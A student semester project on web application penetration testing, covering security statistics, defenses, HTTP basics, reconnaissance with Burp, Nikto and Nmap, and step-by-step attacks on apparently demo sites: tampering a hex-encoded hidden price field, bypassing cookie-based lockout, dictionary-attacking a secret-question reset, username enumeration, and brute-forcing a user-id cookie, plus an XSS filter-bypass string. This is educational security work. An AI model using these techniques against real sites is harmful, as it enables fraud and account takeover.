

Shawn Seaman
Semester Project
Web Application Penetration Testing

Table of Contents
Why Web Apps?
Security Overview
Core Defense
Technologies Needed to Be Understood
Application Mapping
Client Side Control Attacks
Session Management
Bypassing Access Controls
SQL Injection
OS Command Injection
File Path Manipulation
Attacking Users with Cross Site Scripting
Cross Site Request Forgery
Conclusion



Why Web Apps?

Before the introduction of web applications, attackers had fewer routes of
attack. Web apps employ a wide variety of code and utilize many protocols, and
the avenues of attack are therefore much greater than with traditional web
server exploitation. Before web applications, an attacker needed only to gain
access to the web server itself, where they could modify files, deface the site, or
use the server to distribute their own files. Web applications, on the other hand,
interact with a client browser; one of the most fundamental purposes of a web
application is to interact with a client. More specifically, a web application accepts
client input and passes this input to internal databases, which can in turn
be exploited to steal credentials, bank details, and so on. Web applications are
heavily utilized because they are lightweight and allow dynamic content to be served to
the client on the fly. The connection takes place over web browsers, and these
current browsers are robust in their own right: they are the middlemen that allow
the stateless HTTP connection to occur, handle client side processing to
take load off of the web server, and provide user friendly input controls that all
users are familiar with. There may well come a time when the only
application utilized client side is a browser. Web applications include word
processing like Google Docs, shopping (Amazon), banking (Chase, Citibank), web
search, email (prior to this, email was handled on a separate server), and
administrative interfaces for hardware devices. It is obvious how useful web
applications are, and it is easy to see the advantage of paying bills from a
browser over HTTP connections that are tunneled for security (HTTPS) versus having
to go to a bank and physically doing it, but this does not come without challenges.
The versatility, scope, and diversity of the multitude of different web apps make it a
major challenge to secure them.

Web Application Security Overview

A layman user may see that a web application they are interacting with is SSL
secured and take solace in the fact that there is a successful SSL handshake and
the site's certificate is trusted. Unfortunately, SSL is only one means of securing
data between client and server. SSL should not be dismissed completely, because it
has its use in defending against certain eavesdropping attacks, but it has no
relevance to the types of attacks that can be launched on the client side of a web
application, nor does it stop any type of server side exploitation that can be
performed. For example, if a malicious user were to send malicious commands
through a username field in a login box, having SSL send that information securely
has nothing to do with the fact that those malicious commands could make the
server contact its back end database and fetch real username and password
credentials. The authors of The Web Application Hacker's Handbook, for example,
performed thousands of penetration tests on SSL secured websites, and the
vulnerabilities they were able to exploit fell outside the scope of SSL protection.

In their findings, they encountered broken authentication on sites at a rate of
67 percent. Broken authentication can be simplified to describe a site that has a
weak login mechanism. Whether that weak login mechanism means that the login
was able to be bypassed completely, or controls were not setup to stop brute force
attacks, varies from site to site. Broken access controls were seen at an even
higher rate, affecting 78 percent of all web applications tested. Broken access
controls defeat the purpose of even having login mechanisms, as it allows standard
users, or even guest users, to break functionality, by viewing other user data or
performing unauthorized actions on the web application. SQL injection was seen at
a rate of 36 percent, and though lower, is one of the more damaging attacks. SQL
injection allows attackers to submit SQL commands through the interface of a web
application, and where weak web applications do not sanitize this specially crafted
input, the commands are passed to the database of the web application and
executed on behalf of the malicious user. Cross site scripting (XSS) and information
leakage were seen at rates of 91 percent and 81 percent, respectively. XSS attacks
allow malicious users to actively attack other users on the site, enabling them to
steal credentials or carry out commands at the same privilege level as the victim,
using the victim as a proxy.
Information leakage is mostly seen in the form of flawed error handling. An
example of this is when inputting an apostrophe (') after a URL parameter (.php?
id=32) causes the web site to throw an SQL error (the apostrophe is an SQL string
delimiter). This defective error handling tells the attacker that SQL injection may
be possible, since the database processed the delimiter. There are countless
vulnerabilities that may arise because of the mere fact that clients must be able to
interact with the

application. Developers of applications must make no assumptions about how a
client may interact with the interface. Malicious users can pass database queries
through input fields, they can modify hidden url parameters to change prices in a
shopping cart, they can intercept and modify cookies that contain session ids of
other users(masquerading as them), and much more. This is just a brief overview
and all these attacks will be explained in greater detail. Immature security
awareness is a common problem with web applications. In house developers are
not necessarily IT security experts. Where they are able to produce functioning
code, they may not understand secure code. Even deeper down the rabbit hole,
where they understand secure code, they may not understand the complex
protocols employed by the application they are designing, and the security flaws
that are inherent to those protocols. Many developers employ the use of third party
plugins and simply integrate them with their own code. These third party plugins
are not necessarily vetted correctly, nor do they adhere to any type of security
standard. This means two things and that is all web applications turn out being
unique and bring their own unique set of vulnerabilities. An operator of a word
press site may have updated their word press template to the most recent secure
version, but if they are using an outdated or even current third party plugin (ex:
calendar plugin) that has vulnerabilities; it creates a premise for the attacker to
exploit the entire application. They need only to scan the site for vulnerable
plugins, and map out their attack methodology from there. Many in house and
contracted web app developers use extremely robust development tools that allow
complex programs to be created with relatively simple input from the actual
programmer. This handicaps programmers to an extent, because they have less
control and less understanding of the framework they are employing, and the
possible exploits that lie within it. When adding this to time and budget constraints,
it is easy to understand why so much vulnerable web applications are in production.
With a deadline approaching, it is faster and cheaper to perform a quick surface
penetration test to finger the more blatant exploits in a product. Unfortunately, in
many instances it takes a full code review and much more stringent testing to find
the less obvious exploits. The scope of many companies' IT security seems to lie in
defending the perimeter of their networks. This is not a bad thing, but with the rise
of web applications and the understanding of web applications being open to
clients, it makes sense that many companies would rethink their security priorities.
Perimeter protection firewalls, and DMZs are great but many backend databases
that communicate with web applications and in turn with the user cannot be
secured with simple perimeter protection. For example, a web app for a bank may
be grouped with other web applications in a certain DMZ, but when the client
submits requests to access certain account details, the web application may query
servers deep into the corporate infrastructure. Standard perimeter protection would
not stop an attacker who was able to leverage a web application to submit malicious
queries to databases beyond the network, nor would it stop an XSS attack where the
attacker was able to hijack a session that allows more privilege. It is very realistic
to paint a scenario where the attacker leverages the application to bypass all

perimeter protection, by breaking authentication of the application, then pivoting to
other machines, mapping out the network further, and escalating privileges on the
internal network. From there they can even break into other web applications that
exist on the infrastructure level and attack employees and superiors. The shift of
focus must be on web application security as that can nullify perimeter security in a
wide array of ways. Worst of all, such power can be harnessed with a simple
browser, and other tools working in conjunction with the browser. A final thought on
web application security is once again the assumptions of developers. Web
developers must assume that malicious attackers will use
powerful tools to create thousands of connections, requests, login attempts, or any
amalgamation of database queries to make the web app behave in unintended ways.
User-agent protection is complicated, or not employed, and many tools allow the
spoofing of user-agent, so they can appear as standard web browsers, such as
Chrome, Firefox, and Internet Explorer.
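As a small illustration of the information leakage problem discussed above, the sketch below flags response bodies that contain verbose database error signatures after an apostrophe probe. The signature list is a small, hypothetical sample, not an exhaustive catalogue:

```python
# Sketch: flag responses that leak database errors after an apostrophe probe.
# The signature list below is a small illustrative sample, not exhaustive.
ERROR_SIGNS = [
    "you have an error in your sql syntax",   # MySQL
    "unclosed quotation mark",                # MS SQL Server
    "ora-01756",                              # Oracle
    "pg::syntaxerror",                        # PostgreSQL
]

def looks_like_sql_error(body):
    """Return True if the response body contains a known SQL error signature."""
    lowered = body.lower()
    return any(sig in lowered for sig in ERROR_SIGNS)

# A verbose error page leaks; a generic not-found page does not.
print(looks_like_sql_error("You have an error in your SQL syntax near ''"))  # True
print(looks_like_sql_error("Page not found"))                                # False
```

In practice such a check would be run against the responses collected by an intercepting proxy, with any hit prioritized for manual SQL injection testing.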

Core Defense
The three mechanisms of securing the user access of a web application are
authentication, session management, and access controls.
The most common way to manage user access is through authentication.
The username and password combination is the obvious choice for authentication,
but challenge-response tokens and client certificates serve as added
security measures. Other
capabilities are ingrained into authentication mechanisms, such as password reset.
Such capabilities are also open to attack.
The next logical step after authentication is to manage the actual user's
session. With a web application handling hundreds of HTTP requests from numerous
users, it needs a way to determine which requests are coming from which respective
user. This is handled by generating sessions for authenticated users. This is done
by submitting a token to a user that contains a session id. The token is contained
inside of a cookie. This works effectively as the tokens are submitted back and forth
in http requests during the session, keeping track of the user, and adding an
effective timeout in response to null user activity if necessary. Unfortunately, this is
a massive avenue of attack. An attacker can ignore attacking authentication if they
can successfully hijack a user's session. This effectively enables them to
masquerade as that user, along with that user's special privileges. Even worse,
some session tokens are not transmitted in an http request via cookies, but actually
in hidden form fields within the html code of the web app. This is easily intercepted
by a proxy interceptor and can be manipulated by an attacker.
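Given how valuable session tokens are to an attacker, they must at minimum be unpredictable. A minimal sketch of session ID generation using Python's standard secrets module:

```python
# Sketch: generate unpredictable session IDs with a CSPRNG.
# Predictable or sequential IDs are what make session hijacking trivial.
import secrets

def new_session_id():
    # 32 random bytes ~= 256 bits of entropy, URL-safe Base64 encoded
    return secrets.token_urlsafe(32)

sid = new_session_id()
print(len(sid))  # 43 characters of URL-safe Base64
```

The token should then be delivered only in a Set-Cookie header (never in a hidden form field) and mapped to the user server side.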

We have covered authenticating a user and managing specific users'
sessions once they are authenticated, but actually enforcing this across every HTTP
request and every possible interaction on every portion of the web application is a
huge challenge. Developers cannot make any assumptions about how a user may
interact with the application, because incorrect access controls can allow an
attacker to bypass the checks of access. Checking that access controls are
consistent and enforced is a huge undertaking, and the failure of this auditing can
be traced back to the fact that developers are under tight budgets and time
constraints, especially when it comes to security review taking a back seat. Access
control may be checked on one portion of the application, but then on a submission
form for example, the app may not enforce access correctly, allowing an attacker to
exploit from that specific web page, where he failed at others. The key here would
be to audit every page, every function, of the web application that a user can
possibly access.
All user input in a web application should be inherently untrusted. Web application
developers should make no assumptions about what type of input a user will submit
to the web application before it is passed to the server. Malicious users will look to
submit malformed data through input fields that may allow them to bypass
authentication, or hijack databases. Make no assumptions that a user will only
submit their username and password into a login field, nor that they will adhere to
a six character maximum or alphanumeric-only type of enforcement. One
could use blacklisting ("reject known bad") techniques here, but this is a weak
technique with a very limited scope. For example, if a form accepts the
full name of a person and needs to accept the apostrophe in many people's last names,
blacklisting the apostrophe character is severely limiting. Attackers can also
encode the malicious characters they are submitting. Where an apostrophe (') may be a
blacklisted character, its URL-encoded version %27 may not be. This
effectively shows that a blacklist would have to be overly robust and also have to
keep up with ever expanding, evolving attacks. Whitelisting, or "accept known good,"
is very powerful but also comes with a limited scope. The same issue occurs when,
for example, you whitelist alphabetical and numerical characters but exclude
certain special characters that need to be incorporated into the field, because of the
small chance they may be characters leveraged in an attack. Data sanitization is key
in defending against malformed user input. Instead of a simple whitelist or blacklist
approach, the application can look to remove malicious characters as they travel
from client to server. For example, the application can remove an apostrophe while
still allowing the input through, and then, through decoding/encoding, append the
apostrophe back into the statement safely at a certain boundary. This is the primary
reason boundary checks
are important. It is very hard to secure input at one choke point, and therefore it
makes more practical sense to do it in stages. For example, make sure at a login
form that the username and password was a specific length and correct type of
character, and then at a different boundary server side or just after the login
whitelisting, perform a sanitization of removing any SQL query input by escaping

any problematic character before the query is made. Semantic checks are also
important and cannot be ignored. No amount of input sanitization will stop a
malicious user who has effectively been able to perform transactions as a different
user by hijacking a session (done by manipulating a cookie or hidden form field).
Therefore, validate that the correct user is matched to the correct account before
permitting transactions. This sounds like common sense, but the scope of web
application security is so large that these things are easily forgotten during the
mapping of an application. There is no single solution to stopping bad input, and
the answer is not always to clean some of it, but sometimes to block it completely.
In other words, as pointed out previously, blacklists are a terrible component to rely on.
Taking a look at an example of injecting HTML code into a web app form field shows
the complex nature of securing input. A blacklist may strip <script> from input,
but what if the stripping is not done recursively? The filter is effectively
defeated by submitting <scr<script>ipt> instead: a single pass of removal
reassembles the forbidden tag. A combination of all these methods is more appropriate,
but nothing about defeating malformed input is intuitive, and it must be approached
with great care.
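The recursive stripping pitfall just described can be demonstrated in a few lines. This is an illustrative filter sketch, not a production sanitizer (real defenses should prefer contextual output encoding over stripping):

```python
# Sketch: a single-pass blacklist filter vs. a recursive one.
# Real defenses should prefer contextual output encoding over stripping.
def naive_strip(s):
    # one pass: removing "<script>" can reassemble a forbidden tag
    return s.replace("<script>", "")

def recursive_strip(s):
    # repeat until the input stops changing
    prev = None
    while prev != s:
        prev, s = s, s.replace("<script>", "")
    return s

payload = "<scr<script>ipt>"
print(naive_strip(payload))      # <script>  (filter defeated: the tag reassembled)
print(recursive_strip(payload))  # (empty string: the tag is fully removed)
```

The single-pass filter turns the crafted payload back into the very string it was supposed to remove, which is exactly the bypass described above.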
While great care in stopping attacks has been covered, how to handle attackers
should carry as much weight. Proper administrator alerting should be employed,
along with IP and account blocking as a response to attacks. IPS/IDS should be deployed in
front of the web server. Logs should be maintained and monitored to respond to
suspicious behavior. Alerts should cover any suspicious activity, not just
suspicious attack query strings: unusual funds transfers, for example, or
an unusual number of IPs generating HTTP requests to the server and/or unusual
activity coming from that large array of IPs. Securing the authentication method
for administrators is crucial. Many times administrator authentication, and even the
admin panel an administrator interacts with, is not secured. This is because of
assumptions made by developers that only privileged users will ever access these
functions. If an attacker breaks authentication on the admin side, they now control the entire
application and its users. If the admin interface is weak, the attacker can leverage
cross site scripting attacks to steal admin cookies, for example. It is imperative to
secure the admin interface.

Technologies Needed to Be Understood

HTTP is a connectionless method for the communication between server and
client, but it uses the stateful protocol of TCP to carry its messages. The
communication between client and server is initiated with the TCP handshake. The
HTTP request and HTTP response are the two message types between client (request)
and server (response). They both contain HTTP headers. A brief overview of the
different types of headers should be examined. On the request side:
Accept (what type of content the browser can accept)
Authorization (submits credentials to the server)
Cookie (submits the cookie to the server that was originally sent by the server)
User-Agent (info on the browser being used)
If-None-Match (sends an entity tag that was originally sent by the server, specific
to the requested resource; the server can decide whether to use the cached resource
or send a dynamically updated newer one)
If-Modified-Since (sends the time the resource was last requested by the browser;
the server will reissue a cached version if nothing has changed)
Host (specifies the hostname that is part of the entire URL being requested)
On the server side we have the following notable headers as well:
Cache-Control (specifies caching parameters of the resource; if it is never to be
cached, a no-cache tag is issued in this header field)
ETag (correlates with the entity tag that was sent by the browser; it is originally
generated by the server)
Expires (specifies how long a client can access a cached resource before it is ended)
Server (importantly, describes information about the server in use)
Set-Cookie (sets the specific cookie that will be sent to the browser to
establish a session)
Two types of HTTP requests must be discerned: POST requests and GET
requests. A POST request performs an action on the application, whereas GET
requests are more suitable for retrieving resources from a URL. Other methods
include the HEAD request, which is similar to a GET request but only returns
headers and no message body. A PUT request enables the upload of a resource to
a site, which can be leveraged for attack if enabled by the server. Multiple cookies
can be set in the Set-Cookie header of an HTTP response. The header can also
specify different options, such as the path of the cookie, whether or not it can only
be transmitted over HTTPS, and when it may expire, effectively expiring a session.
Some response codes should be understood before attacking applications. 200 OK
means successful handling of the HTTP request; the full response has been returned.
302 Found specifies a redirect to a different URL, which is given in the Location
header of the HTTP response. 304 Not Modified reissues a cached resource, making
that decision based on the If-None-Match and If-Modified-Since headers in the HTTP
request. 400 Bad Request will occur when an invalid request is submitted, most
likely due to some sort of malformation. 401 Unauthorized specifies a need to
authenticate before accessing a resource. 403 Forbidden specifies that a resource
is not able to be accessed even with authentication. 404 Not Found specifies a
resource is not in existence. 405 Method Not Allowed specifies using one of the
methods spoken about above where it is not supported by the server; an example
would be trying to upload a script to a server where the PUT method is not allowed.
The 413 Request Entity Too Large response can be seen during buffer overflow
attacks. 500 Internal Server Error and 503 Service Unavailable are self-explanatory
server side issues.
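The request/response anatomy above can be made concrete with a short sketch that composes a raw HTTP/1.1 request and parses a response status line. The hostname and cookie value are made up for illustration:

```python
# Sketch: build a raw HTTP/1.1 request and parse a response status line.
# Hostname and cookie value below are made-up illustrations.
def build_request(method, path, host, headers=None):
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    return "\r\n".join(lines) + "\r\n\r\n"  # blank line ends the header block

def parse_status(status_line):
    _version, code, reason = status_line.split(" ", 2)
    return int(code), reason

req = build_request("GET", "/login.asp", "shop.example",
                    {"User-Agent": "Mozilla/5.0", "Cookie": "SESSID=abc123"})
print(req.splitlines()[0])                        # GET /login.asp HTTP/1.1
print(parse_status("HTTP/1.1 304 Not Modified"))  # (304, 'Not Modified')
```

Seeing requests laid out this way makes it clearer what an intercepting proxy is actually editing when headers or cookies are tampered with.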

Encoding will be used constantly within the sphere of attacking web
applications. HTML and HTTP are extremely text based, so it makes sense
that heavy encoding is utilized by both in order to provide seamless transmission
of unusual characters. Attackers can take advantage of the inherent encoding
schemes employed by web apps by decoding suspicious encoded strings that are
obviously protecting data and, even more devastatingly, by encoding malformed
data to bypass web filters. Concerning URL encoding, the following characters
should always be URL encoded when being used to attack applications:
space % ? & = ; + #. Unicode encoding will be used the most when trying to bypass
filters. HTML encoding will be utilized the most when looking to exploit apps that
are vulnerable to cross site scripting attacks. If the application returns the HTML
output, for example in a dialog box, without the HTML characters escaped, the
application is likely vulnerable. Base64 and hex encoded strings should both
be looked out for when analyzing the content of an HTTP response message body.
Any such strings should be decoded, because it is likely that the real messages
contained in these encoded strings reveal information the developers do not want
being viewed.
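All of the schemes above are reversible with Python's standard library. A sketch round-tripping an arbitrary example payload through URL, Base64, and hex encodings:

```python
# Sketch: encode and decode the schemes an attacker meets most often.
import base64
import urllib.parse

payload = "' OR 1=1--"  # arbitrary example string

url_enc = urllib.parse.quote(payload, safe="")        # %27%20OR%201%3D1--
b64_enc = base64.b64encode(payload.encode()).decode()
hex_enc = payload.encode().hex()

# Each scheme decodes back to the original payload.
print(urllib.parse.unquote(url_enc))           # ' OR 1=1--
print(base64.b64decode(b64_enc).decode())      # ' OR 1=1--
print(bytes.fromhex(hex_enc).decode())         # ' OR 1=1--
```

Tools like Burp's decoder automate exactly this round-tripping, but it is worth knowing how trivial the underlying transformations are.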

Application Mapping
It is vital to enumerate all the content of a web app before attempting to
exploit it. All functionalities and pages of the web app should be discovered and
walked through. All forms and drop down menus should be explored extensively.
Automatic spidering is a useful method, to display many of the different areas of the
site that should be explored. This can be performed with the Spider in Burp Suite.

Using this tool we can go through the different categories and functions of the site.
Interesting URLs with more promising potential content can be spidered further to
dig deeper into the directory. Listing the directory contents alphabetically allows
searching for specific keywords, for example login.asp. Pages like this should be
further analyzed and prioritized in the scope of attack. Automated spidering used
alone, without any user directed spidering, falls short though. Auto spidering will
break functionality at many points, considering it may run into issues with apps that
reissue tokens a certain way at every page load. It may also run into
problems at authentication pages. Even worse, automatic spidering by default will
look to navigate all drop down menus and insert test strings into every possible
form field it can. While this can be useful, it can cause major alerts to go off on the
intrusion detection side and, in a worst case scenario, access some admin
functionality and perform requests that damage the functionality of the app. Lastly,
automatic spidering may miss URLs when building the site map, as well as hidden
content. Automatic spidering should be used in conjunction with user directed spidering.
Burp Suite, which acts as an intercepting proxy, will log
every request and response made to and from the browser and web app. Stepping
through each page manually will allow the user to approach things more
methodically. Users can log in through authentication processes and map the
pages that spawn as a result of elevated privileges. Once they discover relevant
pages by manual mapping, automated attacks can be launched to catch other
resources that are hidden. Examples of hidden content could be
admin.php, users.php, etc. These could be URLs that are not accessible via
spidering. Burp Suite and other tools allow text lists of keywords to be created and
iterated through automatically. A good text list may contain keywords such as
admin, users, accounting, access, accounts, and more. If one could not access this
hidden content with spidering, a brute force of hundreds of requests using these
keywords appended to the proper hostname will expose it, and
effectively allow us to complete our site map. Another important tip is to always
check the site's robots.txt file. The robots.txt file will list URLs that the site does not
wish to be indexed by search engines.
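Generating candidate URLs for such a brute force is simple to script. The hostname and extension list below are hypothetical; in practice each candidate would then be requested (for example with Burp Intruder) and non-404 responses flagged:

```python
# Sketch: build candidate URLs for hidden-content brute forcing.
# Hostname and extension list are hypothetical examples.
base = "http://shop.example/"
keywords = ["admin", "users", "accounting", "access", "accounts"]
extensions = ["", ".php", ".asp", ".aspx"]

candidates = [base + word + ext for word in keywords for ext in extensions]
print(len(candidates))   # 20 candidate URLs
print(candidates[1])     # http://shop.example/admin.php
```

A real run would combine a much larger wordlist with the extensions already fingerprinted for the target's technology.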

In this example we see that for any browser
(User-agent: *), cowindex.xml is disallowed. Upon going to that specific URL, it was
found to be a sitemap with dates appended to every resource updated in the
past year, and specifications for when each resource was added. Attackers may also
leverage public info in attacks. Using Google can come in handy for this. For
instance, searching with the link: operator returns all indexed pages that have the
site linked within them. Combining the site: operator with the term login is another
useful example, as that will return every result of the site that has the term login
existing on it. One may also look to access cached content during the recon phase.
Sites like the Wayback Machine will allow an attacker to view a cached history of
different versions of the site. This can be useful because an older snapshot of the
site may not have hidden resources as effectively as newer versions, allowing you
to gather more content to apply to the updated version.
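Returning to the robots.txt tip, harvesting its Disallow entries is easy to automate: fetch the file and collect every disallowed path as a starting list of interesting resources. The file contents below are a made-up example:

```python
# Sketch: harvest Disallow entries from a robots.txt body.
# The file contents below are a made-up example.
robots_txt = """User-agent: *
Disallow: /cowindex.xml
Disallow: /admin/
Allow: /public/
"""

disallowed = [
    line.split(":", 1)[1].strip()
    for line in robots_txt.splitlines()
    if line.lower().startswith("disallow:")
]
print(disallowed)  # ['/cowindex.xml', '/admin/']
```

Each harvested path then goes straight into the site map for manual review, since the operator explicitly did not want it indexed.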
An attacker should also fingerprint the actual web server.
Depending on which web server the web application lies on, different technologies
will be employed, as well as different vulnerabilities. There are automated and
manual methods for gathering information on the web server. The first
option is to use a scanner like Nikto, which will reveal much useful
information. It is important to note that scanners generate thousands of signature
requests and false positives can be a problem, so it is common practice to double
check any finds manually.

In the example above, the banner has been successfully grabbed, revealing that a
Microsoft IIS server is being employed. ASP.NET is the platform used on the
Microsoft servers.


The scan shows the HTTP methods allowed by the server. If the PUT method was
enabled that could be of interest, possibly allowing an attacker to upload malicious
scripts. The admin control panel page is also found, which was hidden during the
automatic spidering. (done from brute forcing common parameters)

Nmap scans are also an alternative. This scan reveals once again that it is an IIS
server, and also reveals an FTP server running on port 21, which can also be
leveraged for attacking. Attackers can also look at file extensions to identify web
server technologies. If the .asp extension is seen, that suggests a Microsoft IIS
server is at play. Other notable extensions: .cfm (ColdFusion), .aspx (Microsoft
ASP.NET), .jsp (Java Server Pages), and .php (PHP). Manually discovering the
application technology can be accomplished by taking advantage of apps that throw
error messages. An attacker can request a made up, non-existent filename with the
correct extension and get an error message tailored to the missing resource. If, for
example, the attacker then requests a resource that does not exist but uses a
different technology's respective extension, they may get a simple page not found
error message. This allows the attacker to deduce which technology is actually being used.
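The extension-to-technology mapping can be captured in a small lookup table, limited here to the extensions just discussed:

```python
# Sketch: infer server-side technology from a resource's file extension.
# Mapping limited to the extensions discussed above.
import posixpath

EXTENSION_TECH = {
    ".asp": "Microsoft IIS (Classic ASP)",
    ".aspx": "Microsoft ASP.NET",
    ".jsp": "Java Server Pages",
    ".cfm": "ColdFusion",
    ".php": "PHP",
}

def fingerprint(url_path):
    _root, ext = posixpath.splitext(url_path)
    return EXTENSION_TECH.get(ext.lower(), "unknown")

print(fingerprint("/login.aspx"))  # Microsoft ASP.NET
print(fingerprint("/cart.cfm"))    # ColdFusion
print(fingerprint("/readme.txt"))  # unknown
```

An "unknown" result is itself useful: it is the cue to fall back on banner grabbing or the tailored-error-message trick described above.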

Client Side Control Attacks

A huge issue with web app security is client side
controls. Whether in the form of a cookie, HTML form, Java applet, or URL parameter,
many functions of a web app can be controlled client side. It should be understood that all
user input, or for that matter all client submitted input, is untrusted. This makes sense,
considering that if application logic is controlled client side and not server side, the
client can control and manipulate the data. For instance, if the price of an object is
being submitted via a cookie, it would be trivial to intercept this cookie with an
intercepting proxy and manipulate the cookie's data. Even if the data is encoded, a
determined user can throw the strings through a gauntlet of automatic decoders. At
that point they would be able to re-encode their own value and plug it back
into the HTTP header, cookie, or HTML of the page. It is important therefore to
refrain from allowing client side control over critical items such as price. If a
user can intercept parameters such as amount and item name, so be it, but
critical items such as prices and even discounts should be locked down server side.
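Where a client must carry such a parameter, a server-side keyed hash (a MAC, the same idea behind ASP.NET's ViewState MAC discussed below) lets the server detect tampering. A minimal sketch, with a made-up secret key that would live only on the server:

```python
# Sketch: sign a client-carried parameter so the server can detect tampering.
# The secret key is a made-up example and would live server side only.
import hashlib
import hmac

SECRET_KEY = b"server-side-secret"

def sign(value):
    mac = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"

def verify(token):
    value, _, mac = token.rpartition("|")
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None

token = sign("price=449")
print(verify(token))                  # price=449  (untouched, accepted)
print(verify("price=4|" + "0" * 64))  # None       (tampered, rejected)
```

Note that signing only proves the value was not modified; it does not stop an attacker from replaying a legitimately signed cheaper value, which is why binding the signature to an item tag, as described above, matters.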
If parameters must be handled by the client, they should be verified by the server
as well. For example, if the application encrypts the price of a phone, an encrypted
item tag should also be appended and then checked server side. If the phone prices
were simply encrypted, the attacker could copy the encrypted cheaper price and
substitute that string for a more expensive device before submitting the request
back to the server. The same way hidden HTML form fields are manipulated, client
side scripts can easily be manipulated to change output in a way that benefits the
attacker. It is common to see JavaScript where elements are disabled, which
disallows a browser from editing the feature. If this is not locked down, it can be
abused and re-enabled. ASP.NET, the technology employed by Microsoft servers,
utilizes a feature called ViewState. It is essentially a hidden form field containing
serialized parameters that, like a cookie, are carried across successive page
requests for the user's session. Parameters such as item prices or a shopping cart
total are popularly carried in the ViewState. The data is usually Base64 encoded,
which is trivial to defeat with the Burp decoder. If the developer insists on using
the ViewState feature, it is recommended that they enable the ViewState MAC by
setting the EnableViewStateMac parameter to true. Upon enabling this MAC, a
keyed hash is appended to the ViewState data, which hinders actual tampering
within the ViewState. Regardless of whether one can tamper with the data or not, it
is still important to view the actual data in the ViewState, because such decoded
data could possibly be utilized for submission to other fields across other pages of
the web app. When dealing with Java code, such as casino games, where the applet
is controlled client side (which should not be done, but has been seen!), an attacker
can download the byte code and decompile it with a Java decompiler like Jad. Upon
decompiling and accessing the source code, an attacker could change, for example,
a method that gets the score so that it submits a static value like 100,000, and
re-compile the source code back into byte code. Finally, finding a way to re-upload
the new jar with the modified program allows the attacker to submit fraudulent
scores to the server. It is imperative that developers obfuscate their Java code to
help frustrate attackers who are looking to review and manipulate source code.
Attacks (see below):

A seemingly normal shopping cart for phones is seen above (a fake demo site).


A hidden form field is located when looking at the source code of the page. So, it is
sent to Burp decoder. It is encoded as ASCII hex and decodes as price=449.

Seen above, we will change the price to 4 dollars instead, and re-encode it so as to not break the application.
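The decode-modify-re-encode step can be scripted outside Burp as well. A minimal sketch; the field value mirrors the price=449 example above, and the helper names are my own:

```python
# Tamper with an ASCII-hex encoded hidden form field: decode, modify, re-encode.

def decode_hex_field(encoded: str) -> str:
    """Decode an ASCII-hex encoded form field value back to plaintext."""
    return bytes.fromhex(encoded).decode("ascii")

def encode_hex_field(plain: str) -> str:
    """Re-encode a tampered value so the application still parses it."""
    return plain.encode("ascii").hex()

original = "price=449".encode("ascii").hex()     # as it appears in the hidden field
decoded = decode_hex_field(original)             # 'price=449'
tampered = encode_hex_field(decoded.replace("449", "4"))
print(decoded, "->", decode_hex_field(tampered)) # price=449 -> price=4
```

The same pattern applies to base64-encoded fields like the ViewState; only the codec changes.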

Submit the re-encoded value in the proxy interceptor, and submit the request.


After the request is submitted, the price has been manipulated. Alarmingly, the prices are able to be changed because they are handled client side instead of server side.

The above application disables the price input via a form field attribute, but submits it via that non-editable form field nonetheless. As bizarre as this seems, it is being covered because it has been seen before.

Notice in the source code, a disabled=true parameter being submitted in a hidden
form field.

We change this to enabled=true, and submit the request.


Application is defeated.

Do not use remember me cookies that wrap the credentials inside of them. Produce responses of identical length and identical error messages when a user enters the wrong password for a username, or enters a username that does not exist. This will stop the attacker from being able to enumerate usernames to brute force at a later time. Do not use secret questions as an account recovery mechanism if they have predictable or low-entropy answers. These are easily dictionary attacked. In using account recovery options, do not reset the password on the application directly upon a correct secret answer. A more in-depth approach is to have a successful answer trigger an email, containing a recovery URL, to the user's email address. This generated URL should not be predictable, but instead completely randomized. Further, it should have a set expiration time as well. The following attacks will look to attack bad authentication methods, all of which have been seen in actual practice.
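The randomized, expiring reset URL recommended above can be sketched with the standard library. The names and the 15-minute window are illustrative, not from any particular framework:

```python
import secrets
import time

RESET_TTL_SECONDS = 15 * 60   # illustrative 15-minute expiration
_pending_resets = {}          # token -> (email, expiry); a real app would persist this

def issue_reset_token(email: str) -> str:
    """Generate an unpredictable reset token with a set expiration time."""
    token = secrets.token_urlsafe(32)   # cryptographically random, not guessable
    _pending_resets[token] = (email, time.time() + RESET_TTL_SECONDS)
    return token

def redeem_reset_token(token: str):
    """Return the email for a valid token, consuming it; None if invalid or expired."""
    record = _pending_resets.pop(token, None)   # single use: popped on first try
    if record is None:
        return None
    email, expiry = record
    return email if time.time() <= expiry else None
```

The token would be embedded in the emailed URL; because it is random, single use, and expiring, it defeats both guessing and replay.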


Above, a normal account lockout mechanism from too many incorrect logins is shown.

The session id cookie will be deleted/changed, and the effect that has on the
application will be noted.

The user is no longer locked out, as lockout is based on a static cookie that can automatically be deleted in automated brute force attacks if needed.


Verification is shown that the login error has changed. It is now accepting credentials again. What about horrible forgot password mechanisms? Mechanisms that send an email verification should always be used. How can an attacker abuse secret answer resets that can be answered without any type of lockout or uniquely generated reset URL sent via email?

We want to intercept the request to set a payload to dictionary attack the secret
answer field.


Payload set correctly in Burp Intruder.

A very large file of colors is scraped from the internet to be used as our dictionary
for the automated attack.


Load the list into the payload options section of Burp Intruder.

Analyzing and ordering the different payload requests sent to the site reveals something interesting. The length of the page returned by magenta differs from all the wrong answer responses, which have a length of 1049 bytes.

Successful reset.

The next attack will attempt to enumerate a real username of a site from a fake one. Many applications load the same error page whether you type in a username that doesn't exist on a site, or type a username that does exist on the site but use the wrong password. Many times, though, there are subtle differences in the source code of the page loaded between a rejected login from a wrong username versus a correct username with a wrong password. We can zero in on real users to attack if we can get actual correct usernames.


The first shot shows a real user, the second shot shows a nonexistent user. The
login pages look identical but let us take a closer look.

We send the two http responses to Burp Comparer. Strangely, there is a 1 byte
difference in length of the error page.


Looking deeper into Burp Comparer, it highlights the difference in words in the source code between the two site responses. Notice the only differences are the two usernames, and subtle html following the last line.

We can also look at the difference in bytes in different areas of the response. This
application fails the username obscurity test.

Next, horrible authorization methods, where a remember me function is used to remember users so they don't have to re-enter their passwords. These functions should not be used, but if they must be, a randomly generated token should be used instead of anything discernible like a user id. This, again, seems utterly insane but has been seen done in applications.

Logging in as yourself and analyzing the http request is recommended.

The application remembers users by their user id, as seen in the cookie parameter. This is ripe for a brute force attack.

Above, the payload being highlighted is the user id parameter.


This payload will sequentially rip through all numbered values 1-100.

